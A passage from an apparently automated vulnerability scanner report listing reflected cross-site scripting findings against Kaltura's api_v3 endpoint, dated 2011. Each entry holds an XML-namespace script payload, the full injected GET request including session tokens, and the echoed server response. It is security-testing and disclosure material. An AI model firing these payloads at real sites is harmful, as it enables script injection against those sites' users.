Confidence:   Certain
Host:   http://www.kaltura.com
Path:   //api_v3/index.php

Issue detail

The value of the 2%3Aservice request parameter is copied into the XML document as plain text between tags. The payload 5e6df<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>a35e4d6ae2f was submitted in the 2%3Aservice parameter. This input was echoed as 5e6df<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>a35e4d6ae2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET //api_v3/index.php?service=multirequest&action=null&kalsig=35b5ede8cd1c622f2acf565d1c38cd52&1%3Aservice=baseentry&1%3AentryId=1%5F6mbkzzuu&2%3Aservice=flavorasset5e6df<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>a35e4d6ae2f&4%3Afilter%3AobjectType=KalturaCuePointFilter&ks=YTk5YWE2N2NiYmM1ZmFkNWIyNTE4OWU3ZjliZjFkZDMwNTRkZDk0ZXw1OTE1MzE7NTkxNTMxOzEzMTYzMDcwNjY7MDsxMzE2MjIwNjY2LjI3NDI7MDt2aWV3Oio7Ow%3D%3D&4%3Afilter%3AentryIdEqual=1%5F6mbkzzuu&3%3AentryId=1%5F6mbkzzuu&3%3AcontextDataParams%3Areferrer=http%3A%2F%2Fwww%2Etmz%2Ecom%2F&2%3AentryId=1%5F6mbkzzuu&4%3Aservice=cuepoint%5Fcuepoint&clientTag=kdp%3Av3%2E5%2E17%2E6&1%3Aaction=get&4%3Aaction=list&1%3Aversion=%2D1&3%3Aservice=baseentry&2%3Aaction=getWebPlayableByEntryId&ignoreNull=1&3%3AcontextDataParams%3AobjectType=KalturaEntryContextDataParams&3%3Aaction=getContextData HTTP/1.1
Host: www.kaltura.com
Proxy-Connection: keep-alive
Referer: http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:54:58 GMT
Server: Apache
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,8367364c8cbfcae00c5d0a59e62daca8,0.0002129077911377
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,af268fcbf1c901b0f173e67272aa3e3f,0.00016903877258301
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,08dc7188ad81536fcd12ce12af4d9a4a,0.00015902519226074
Vary: Accept-Encoding
X-Me: pa-apache2
X-UA-Compatible: IE=EmulateIE7
Content-Length: 3018
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?><xml><result><item><objectType>KalturaMediaEntry</objectType><id>1_6mbkzzuu</id><name>Stevie Wonder: It&apos;s a Case of Steve Jobs Leading the Blind</name><descr
...[SNIP]...
<message>Service "flavorasset5e6df<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>a35e4d6ae2f" does not exists</message>
...[SNIP]...

4.221. http://www.kaltura.com//api_v3/index.php [3%3Aaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaltura.com
Path:   //api_v3/index.php

Issue detail

The value of the 3%3Aaction request parameter is copied into the XML document as plain text between tags. The payload 6ba1c<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>eac667afe39 was submitted in the 3%3Aaction parameter. This input was echoed as 6ba1c<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>eac667afe39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET //api_v3/index.php?service=multirequest&action=null&kalsig=35b5ede8cd1c622f2acf565d1c38cd52&1%3Aservice=baseentry&1%3AentryId=1%5F6mbkzzuu&2%3Aservice=flavorasset&4%3Afilter%3AobjectType=KalturaCuePointFilter&ks=YTk5YWE2N2NiYmM1ZmFkNWIyNTE4OWU3ZjliZjFkZDMwNTRkZDk0ZXw1OTE1MzE7NTkxNTMxOzEzMTYzMDcwNjY7MDsxMzE2MjIwNjY2LjI3NDI7MDt2aWV3Oio7Ow%3D%3D&4%3Afilter%3AentryIdEqual=1%5F6mbkzzuu&3%3AentryId=1%5F6mbkzzuu&3%3AcontextDataParams%3Areferrer=http%3A%2F%2Fwww%2Etmz%2Ecom%2F&2%3AentryId=1%5F6mbkzzuu&4%3Aservice=cuepoint%5Fcuepoint&clientTag=kdp%3Av3%2E5%2E17%2E6&1%3Aaction=get&4%3Aaction=list&1%3Aversion=%2D1&3%3Aservice=baseentry&2%3Aaction=getWebPlayableByEntryId&ignoreNull=1&3%3AcontextDataParams%3AobjectType=KalturaEntryContextDataParams&3%3Aaction=getContextData6ba1c<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>eac667afe39 HTTP/1.1
Host: www.kaltura.com
Proxy-Connection: keep-alive
Referer: http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:59:54 GMT
Server: Apache
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,8367364c8cbfcae00c5d0a59e62daca8,0.00018978118896484
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,b87fa6591bd6b8e5a78a06b79a38679a,0.00018191337585449
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,08dc7188ad81536fcd12ce12af4d9a4a,0.00020194053649902
Vary: Accept-Encoding
X-Me: pa-apache2
X-UA-Compatible: IE=EmulateIE7
Content-Length: 3847
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?><xml><result><item><objectType>KalturaMediaEntry</objectType><id>1_6mbkzzuu</id><name>Stevie Wonder: It&apos;s a Case of Steve Jobs Leading the Blind</name><descr
...[SNIP]...
<message>Action "getContextData6ba1c<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>eac667afe39" does not exists for service "baseentry"</message>
...[SNIP]...

4.222. http://www.kaltura.com//api_v3/index.php [3%3AentryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaltura.com
Path:   //api_v3/index.php

Issue detail

The value of the 3%3AentryId request parameter is copied into the XML document as plain text between tags. The payload 36763<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>ee5cf9bfe44 was submitted in the 3%3AentryId parameter. This input was echoed as 36763<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>ee5cf9bfe44 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET //api_v3/index.php?service=multirequest&action=null&kalsig=35b5ede8cd1c622f2acf565d1c38cd52&1%3Aservice=baseentry&1%3AentryId=1%5F6mbkzzuu&2%3Aservice=flavorasset&4%3Afilter%3AobjectType=KalturaCuePointFilter&ks=YTk5YWE2N2NiYmM1ZmFkNWIyNTE4OWU3ZjliZjFkZDMwNTRkZDk0ZXw1OTE1MzE7NTkxNTMxOzEzMTYzMDcwNjY7MDsxMzE2MjIwNjY2LjI3NDI7MDt2aWV3Oio7Ow%3D%3D&4%3Afilter%3AentryIdEqual=1%5F6mbkzzuu&3%3AentryId=1%5F6mbkzzuu36763<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>ee5cf9bfe44&3%3AcontextDataParams%3Areferrer=http%3A%2F%2Fwww%2Etmz%2Ecom%2F&2%3AentryId=1%5F6mbkzzuu&4%3Aservice=cuepoint%5Fcuepoint&clientTag=kdp%3Av3%2E5%2E17%2E6&1%3Aaction=get&4%3Aaction=list&1%3Aversion=%2D1&3%3Aservice=baseentry&2%3Aaction=getWebPlayableByEntryId&ignoreNull=1&3%3AcontextDataParams%3AobjectType=KalturaEntryContextDataParams&3%3Aaction=getContextData HTTP/1.1
Host: www.kaltura.com
Proxy-Connection: keep-alive
Referer: http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:56:13 GMT
Server: Apache
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,8367364c8cbfcae00c5d0a59e62daca8,0.0001981258392334
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,b87fa6591bd6b8e5a78a06b79a38679a,0.00018692016601562
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,08dc7188ad81536fcd12ce12af4d9a4a,0.00020289421081543
Vary: Accept-Encoding
X-Me: pa-apache2
X-UA-Compatible: IE=EmulateIE7
Content-Length: 3810
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?><xml><result><item><objectType>KalturaMediaEntry</objectType><id>1_6mbkzzuu</id><name>Stevie Wonder: It&apos;s a Case of Steve Jobs Leading the Blind</name><descr
...[SNIP]...
<message>Entry id "1_6mbkzzuu36763<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>ee5cf9bfe44" not found</message>
...[SNIP]...

4.223. http://www.kaltura.com//api_v3/index.php [3%3Aservice parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaltura.com
Path:   //api_v3/index.php

Issue detail

The value of the 3%3Aservice request parameter is copied into the XML document as plain text between tags. The payload bef3c<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>8fc937730d7 was submitted in the 3%3Aservice parameter. This input was echoed as bef3c<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>8fc937730d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET //api_v3/index.php?service=multirequest&action=null&kalsig=35b5ede8cd1c622f2acf565d1c38cd52&1%3Aservice=baseentry&1%3AentryId=1%5F6mbkzzuu&2%3Aservice=flavorasset&4%3Afilter%3AobjectType=KalturaCuePointFilter&ks=YTk5YWE2N2NiYmM1ZmFkNWIyNTE4OWU3ZjliZjFkZDMwNTRkZDk0ZXw1OTE1MzE7NTkxNTMxOzEzMTYzMDcwNjY7MDsxMzE2MjIwNjY2LjI3NDI7MDt2aWV3Oio7Ow%3D%3D&4%3Afilter%3AentryIdEqual=1%5F6mbkzzuu&3%3AentryId=1%5F6mbkzzuu&3%3AcontextDataParams%3Areferrer=http%3A%2F%2Fwww%2Etmz%2Ecom%2F&2%3AentryId=1%5F6mbkzzuu&4%3Aservice=cuepoint%5Fcuepoint&clientTag=kdp%3Av3%2E5%2E17%2E6&1%3Aaction=get&4%3Aaction=list&1%3Aversion=%2D1&3%3Aservice=baseentrybef3c<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>8fc937730d7&2%3Aaction=getWebPlayableByEntryId&ignoreNull=1&3%3AcontextDataParams%3AobjectType=KalturaEntryContextDataParams&3%3Aaction=getContextData HTTP/1.1
Host: www.kaltura.com
Proxy-Connection: keep-alive
Referer: http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:58:39 GMT
Server: Apache
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,8367364c8cbfcae00c5d0a59e62daca8,0.00018906593322754
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,b87fa6591bd6b8e5a78a06b79a38679a,0.00018000602722168
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,08dc7188ad81536fcd12ce12af4d9a4a,0.00018811225891113
Vary: Accept-Encoding
X-Me: pa-apache2
X-UA-Compatible: IE=EmulateIE7
Content-Length: 3820
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?><xml><result><item><objectType>KalturaMediaEntry</objectType><id>1_6mbkzzuu</id><name>Stevie Wonder: It&apos;s a Case of Steve Jobs Leading the Blind</name><descr
...[SNIP]...
<message>Service "baseentrybef3c<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>8fc937730d7" does not exists</message>
...[SNIP]...

4.224. http://www.kaltura.com//api_v3/index.php [4%3Aaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaltura.com
Path:   //api_v3/index.php

Issue detail

The value of the 4%3Aaction request parameter is copied into the XML document as plain text between tags. The payload b2bcb<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>4e93b4c60fb was submitted in the 4%3Aaction parameter. This input was echoed as b2bcb<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>4e93b4c60fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET //api_v3/index.php?service=multirequest&action=null&kalsig=35b5ede8cd1c622f2acf565d1c38cd52&1%3Aservice=baseentry&1%3AentryId=1%5F6mbkzzuu&2%3Aservice=flavorasset&4%3Afilter%3AobjectType=KalturaCuePointFilter&ks=YTk5YWE2N2NiYmM1ZmFkNWIyNTE4OWU3ZjliZjFkZDMwNTRkZDk0ZXw1OTE1MzE7NTkxNTMxOzEzMTYzMDcwNjY7MDsxMzE2MjIwNjY2LjI3NDI7MDt2aWV3Oio7Ow%3D%3D&4%3Afilter%3AentryIdEqual=1%5F6mbkzzuu&3%3AentryId=1%5F6mbkzzuu&3%3AcontextDataParams%3Areferrer=http%3A%2F%2Fwww%2Etmz%2Ecom%2F&2%3AentryId=1%5F6mbkzzuu&4%3Aservice=cuepoint%5Fcuepoint&clientTag=kdp%3Av3%2E5%2E17%2E6&1%3Aaction=get&4%3Aaction=listb2bcb<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>4e93b4c60fb&1%3Aversion=%2D1&3%3Aservice=baseentry&2%3Aaction=getWebPlayableByEntryId&ignoreNull=1&3%3AcontextDataParams%3AobjectType=KalturaEntryContextDataParams&3%3Aaction=getContextData HTTP/1.1
Host: www.kaltura.com
Proxy-Connection: keep-alive
Referer: http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:58:04 GMT
Server: Apache
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,8367364c8cbfcae00c5d0a59e62daca8,0.0001990795135498
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,b87fa6591bd6b8e5a78a06b79a38679a,0.0001988410949707
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,af268fcbf1c901b0f173e67272aa3e3f,0.00016903877258301
Vary: Accept-Encoding
X-Me: pa-apache2
X-UA-Compatible: IE=EmulateIE7
Content-Length: 4179
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?><xml><result><item><objectType>KalturaMediaEntry</objectType><id>1_6mbkzzuu</id><name>Stevie Wonder: It&apos;s a Case of Steve Jobs Leading the Blind</name><descr
...[SNIP]...
<message>Action "listb2bcb<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>4e93b4c60fb" does not exists for service "cuepoint_cuepoint"</message>
...[SNIP]...

4.225. http://www.kaltura.com//api_v3/index.php [4%3Aservice parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaltura.com
Path:   //api_v3/index.php

Issue detail

The value of the 4%3Aservice request parameter is copied into the XML document as plain text between tags. The payload eba7b<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>74c591b57a0 was submitted in the 4%3Aservice parameter. This input was echoed as eba7b<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>74c591b57a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET //api_v3/index.php?service=multirequest&action=null&kalsig=35b5ede8cd1c622f2acf565d1c38cd52&1%3Aservice=baseentry&1%3AentryId=1%5F6mbkzzuu&2%3Aservice=flavorasset&4%3Afilter%3AobjectType=KalturaCuePointFilter&ks=YTk5YWE2N2NiYmM1ZmFkNWIyNTE4OWU3ZjliZjFkZDMwNTRkZDk0ZXw1OTE1MzE7NTkxNTMxOzEzMTYzMDcwNjY7MDsxMzE2MjIwNjY2LjI3NDI7MDt2aWV3Oio7Ow%3D%3D&4%3Afilter%3AentryIdEqual=1%5F6mbkzzuu&3%3AentryId=1%5F6mbkzzuu&3%3AcontextDataParams%3Areferrer=http%3A%2F%2Fwww%2Etmz%2Ecom%2F&2%3AentryId=1%5F6mbkzzuu&4%3Aservice=cuepoint%5Fcuepointeba7b<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>74c591b57a0&clientTag=kdp%3Av3%2E5%2E17%2E6&1%3Aaction=get&4%3Aaction=list&1%3Aversion=%2D1&3%3Aservice=baseentry&2%3Aaction=getWebPlayableByEntryId&ignoreNull=1&3%3AcontextDataParams%3AobjectType=KalturaEntryContextDataParams&3%3Aaction=getContextData HTTP/1.1
Host: www.kaltura.com
Proxy-Connection: keep-alive
Referer: http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:57:10 GMT
Server: Apache
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,8367364c8cbfcae00c5d0a59e62daca8,0.00021195411682129
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,b87fa6591bd6b8e5a78a06b79a38679a,0.00020313262939453
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,af268fcbf1c901b0f173e67272aa3e3f,0.00019097328186035
Vary: Accept-Encoding
X-Me: pa-apache2
X-UA-Compatible: IE=EmulateIE7
Content-Length: 4161
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?><xml><result><item><objectType>KalturaMediaEntry</objectType><id>1_6mbkzzuu</id><name>Stevie Wonder: It&apos;s a Case of Steve Jobs Leading the Blind</name><descr
...[SNIP]...
<message>Service "cuepoint_cuepointeba7b<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>74c591b57a0" does not exists</message>
...[SNIP]...

4.226. http://www.kaltura.com//api_v3/index.php [ks parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaltura.com
Path:   //api_v3/index.php

Issue detail

The value of the ks request parameter is copied into the XML document as plain text between tags. The payload 7c6ff<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>1ea0767c03e was submitted in the ks parameter. This input was echoed as 7c6ff<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>1ea0767c03e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET //api_v3/index.php?service=multirequest&action=null&kalsig=35b5ede8cd1c622f2acf565d1c38cd52&1%3Aservice=baseentry&1%3AentryId=1%5F6mbkzzuu&2%3Aservice=flavorasset&4%3Afilter%3AobjectType=KalturaCuePointFilter&ks=7c6ff<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>1ea0767c03e&4%3Afilter%3AentryIdEqual=1%5F6mbkzzuu&3%3AentryId=1%5F6mbkzzuu&3%3AcontextDataParams%3Areferrer=http%3A%2F%2Fwww%2Etmz%2Ecom%2F&2%3AentryId=1%5F6mbkzzuu&4%3Aservice=cuepoint%5Fcuepoint&clientTag=kdp%3Av3%2E5%2E17%2E6&1%3Aaction=get&4%3Aaction=list&1%3Aversion=%2D1&3%3Aservice=baseentry&2%3Aaction=getWebPlayableByEntryId&ignoreNull=1&3%3AcontextDataParams%3AobjectType=KalturaEntryContextDataParams&3%3Aaction=getContextData HTTP/1.1
Host: www.kaltura.com
Proxy-Connection: keep-alive
Referer: http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:55:41 GMT
Server: Apache
Vary: Accept-Encoding
X-Me: pa-apache2
X-UA-Compatible: IE=EmulateIE7
Content-Length: 896
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?><xml><result><item><error><code>INVALID_KS</code><message>Invalid KS [7c6ff<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>1ea0767c03e]. Error [-1,INVALID_STR]</message>
...[SNIP]...

4.227. http://www.kaltura.com//api_v3/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaltura.com
Path:   //api_v3/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the XML document as plain text between tags. The payload 1e897<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>3935b7cdc89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1e897<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>3935b7cdc89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET //api_v3/index.php?service=multirequest&action=null&kalsig=35b5ede8cd1c622f2acf565d1c38cd52&1%3Aservice=baseentry&1%3AentryId=1%5F6mbkzzuu&2%3Aservice=flavorasset&4%3Afilter%3AobjectType=KalturaCuePointFilter&ks=YTk5YWE2N2NiYmM1ZmFkNWIyNTE4OWU3ZjliZjFkZDMwNTRkZDk0ZXw1OTE1MzE7NTkxNTMxOzEzMTYzMDcwNjY7MDsxMzE2MjIwNjY2LjI3NDI7MDt2aWV3Oio7Ow%3D%3D&4%3Afilter%3AentryIdEqual=1%5F6mbkzzuu&3%3AentryId=1%5F6mbkzzuu&3%3AcontextDataParams%3Areferrer=http%3A%2F%2Fwww%2Etmz%2Ecom%2F&2%3AentryId=1%5F6mbkzzuu&4%3Aservice=cuepoint%5Fcuepoint&clientTag=kdp%3Av3%2E5%2E17%2E6&1%3Aaction=get&4%3Aaction=list&1%3Aversion=%2D1&3%3Aservice=baseentry&2%3Aaction=getWebPlayableByEntryId&ignoreNull=1&3%3AcontextDataParams%3AobjectType=KalturaEntryContextDataParams&3%3Aaction=getContext/1e897<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>3935b7cdc89Data HTTP/1.1
Host: www.kaltura.com
Proxy-Connection: keep-alive
Referer: http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:29 GMT
Server: Apache
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,8367364c8cbfcae00c5d0a59e62daca8,0.00018215179443359
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,b87fa6591bd6b8e5a78a06b79a38679a,0.00018501281738281
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,08dc7188ad81536fcd12ce12af4d9a4a,0.00017595291137695
Vary: Accept-Encoding
X-Me: pa-apache2
X-UA-Compatible: IE=EmulateIE7
Content-Length: 3848
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?><xml><result><item><objectType>KalturaMediaEntry</objectType><id>1_6mbkzzuu</id><name>Stevie Wonder: It&apos;s a Case of Steve Jobs Leading the Blind</name><descr
...[SNIP]...
<message>Action "getContext/1e897<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>3935b7cdc89Data" does not exists for service "baseentry"</message>
...[SNIP]...

4.228. http://www.kaltura.com//api_v3/index.php [service parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaltura.com
Path:   //api_v3/index.php

Issue detail

The value of the service request parameter is copied into the XML document as plain text between tags. The payload a52f6<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>1674c55387c was submitted in the service parameter. This input was echoed as a52f6<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>1674c55387c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

